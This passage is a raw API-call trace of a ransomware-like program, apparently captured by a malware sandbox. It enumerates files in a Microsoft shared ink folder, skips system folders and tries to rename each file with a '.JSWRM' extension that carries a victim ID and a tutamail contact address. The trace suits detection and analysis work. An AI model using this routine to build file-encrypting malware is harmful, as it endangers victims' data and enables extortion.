lpUsedDefaultChar=0x0) returned 5 [0067.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0067.834] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.834] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10049536280073920) returned 0 [0067.834] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0067.834] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0067.834] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0067.834] CloseHandle (hObject=0xffffffff) returned 1 [0067.835] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0067.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.835] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.835] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.835] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0067.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0067.835] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0067.835] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0067.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0067.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.835] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0067.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0067.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0067.835] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x989f72a7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1a8750a, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1a8750a, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x148de, dwReserved0=0x0, dwReserved1=0x0, cFileName="boxed-split.avi", cAlternateFileName="")) returned 1 [0067.835] lstrcmpiW (lpString1="boxed-split.avi", lpString2=".") returned 1 [0067.835] lstrcmpiW (lpString1="boxed-split.avi", lpString2="..") returned 1 [0067.835] lstrcmpiW (lpString1="boxed-split.avi", lpString2="...") returned 1 [0067.835] lstrcmpiW (lpString1="boxed-split.avi", lpString2="windows") returned -1 [0067.835] lstrcmpiW (lpString1="boxed-split.avi", lpString2="recovery") returned -1 [0067.835] lstrcmpiW (lpString1="boxed-split.avi", lpString2="perflogs") returned -1 [0067.835] lstrcmpiW (lpString1="boxed-split.avi", lpString2="documents and settings") returned -1 [0067.835] lstrcmpiW (lpString1="boxed-split.avi", lpString2="$RECYCLE.BIN") returned 1 [0067.835] lstrcmpiW (lpString1="boxed-split.avi", lpString2="system volume information") returned -1 [0067.836] lstrcmpiW (lpString1="boxed-split.avi", lpString2="msocache") returned -1 [0067.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0067.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="boxed-split.avi", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="boxed-split.avi", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="boxed-split.avi", lpUsedDefaultChar=0x0) returned 15 [0067.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0067.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0067.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="boxed-split.avi", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="boxed-split.avi", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="boxed-split.avi", lpUsedDefaultChar=0x0) returned 15 [0067.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0067.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0067.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0067.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0067.836] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.836] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10077367668299056) returned 0 [0067.836] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0067.836] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0067.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0067.836] CloseHandle (hObject=0xffffffff) returned 1 [0067.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0067.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0067.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0067.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0067.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0067.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0067.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.837] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0067.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0067.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0067.837] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x989f72a7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1a8750a, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1a8750a, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x2bfcc, dwReserved0=0x0, dwReserved1=0x0, cFileName="correct.avi", cAlternateFileName="")) returned 1 [0067.837] lstrcmpiW (lpString1="correct.avi", lpString2=".") returned 1 [0067.837] lstrcmpiW (lpString1="correct.avi", lpString2="..") returned 1 [0067.837] lstrcmpiW (lpString1="correct.avi", lpString2="...") returned 1 [0067.837] lstrcmpiW (lpString1="correct.avi", lpString2="windows") returned -1 [0067.837] lstrcmpiW (lpString1="correct.avi", lpString2="recovery") returned -1 [0067.837] lstrcmpiW (lpString1="correct.avi", lpString2="perflogs") returned -1 [0067.837] lstrcmpiW (lpString1="correct.avi", lpString2="documents and settings") returned -1 [0067.837] lstrcmpiW (lpString1="correct.avi", lpString2="$RECYCLE.BIN") returned 1 [0067.837] lstrcmpiW (lpString1="correct.avi", lpString2="system volume information") returned -1 [0067.837] lstrcmpiW (lpString1="correct.avi", lpString2="msocache") returned -1 [0067.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0067.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="correct.avi", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0067.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="correct.avi", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="correct.avi", lpUsedDefaultChar=0x0) returned 11 [0067.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0067.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0067.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="correct.avi", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0067.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="correct.avi", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="correct.avi", lpUsedDefaultChar=0x0) returned 11 [0067.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0067.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0067.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0067.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0067.838] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.838] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10049536280073920) returned 0 [0067.838] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0067.838] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0067.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0067.838] CloseHandle (hObject=0xffffffff) returned 1 [0067.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0067.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0067.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0067.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0067.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0067.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0067.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.838] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0067.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0067.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0067.839] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x989f72a7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1a612b1, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1a612b1, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x32e18, dwReserved0=0x0, dwReserved1=0x0, cFileName="delete.avi", cAlternateFileName="")) returned 1 [0067.839] lstrcmpiW (lpString1="delete.avi", lpString2=".") returned 1 [0067.839] lstrcmpiW (lpString1="delete.avi", lpString2="..") returned 1 [0067.839] lstrcmpiW (lpString1="delete.avi", lpString2="...") returned 1 [0067.839] lstrcmpiW (lpString1="delete.avi", lpString2="windows") returned -1 [0067.839] lstrcmpiW (lpString1="delete.avi", lpString2="recovery") returned -1 [0067.839] lstrcmpiW (lpString1="delete.avi", lpString2="perflogs") returned -1 [0067.839] lstrcmpiW (lpString1="delete.avi", lpString2="documents and settings") returned -1 [0067.839] lstrcmpiW (lpString1="delete.avi", lpString2="$RECYCLE.BIN") returned 1 [0067.839] lstrcmpiW (lpString1="delete.avi", lpString2="system volume information") returned -1 [0067.839] lstrcmpiW (lpString1="delete.avi", lpString2="msocache") returned -1 [0067.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0067.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="delete.avi", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0067.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="delete.avi", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="delete.avi", lpUsedDefaultChar=0x0) returned 10 [0067.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0067.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0067.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="delete.avi", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0067.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="delete.avi", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="delete.avi", lpUsedDefaultChar=0x0) returned 10 [0067.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0067.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0067.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0067.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0067.839] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.840] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9454425611678720) returned 0 [0067.840] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0067.840] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0067.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0067.840] CloseHandle (hObject=0xffffffff) returned 1 [0067.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0067.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0067.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0067.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0067.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0067.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0067.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.840] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.840] HeapFree (in: hHeap=0x1e0000, 